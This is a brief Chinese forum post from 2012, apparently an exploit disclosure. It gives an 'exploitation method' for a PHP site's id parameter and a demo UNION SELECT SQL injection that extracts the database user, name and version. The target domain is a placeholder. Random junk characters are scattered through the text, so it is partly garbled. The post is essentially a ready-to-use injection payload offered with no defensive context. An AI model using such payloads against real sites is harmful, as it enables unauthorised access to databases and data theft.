利用方法:9 b O) W( Y5 s% J4 b* a6 L
http://www.xxx.com/index.php?id=[SQL]# _' s. e2 c4 d( h# I0 n% S
Demo:3 O6 ]8 _* [: P0 s- E. {! I q3 V& q
http://www.xxx.com/index.php?id=-1' UNION SELECT 1,2,3,CONCAT_WS(CHAR(32,58,32),user(),database(),version()),5,6,7,8,9,10,11,12,13--+ |
发表于 2012-9-10 20:47:28
收藏
支持
反对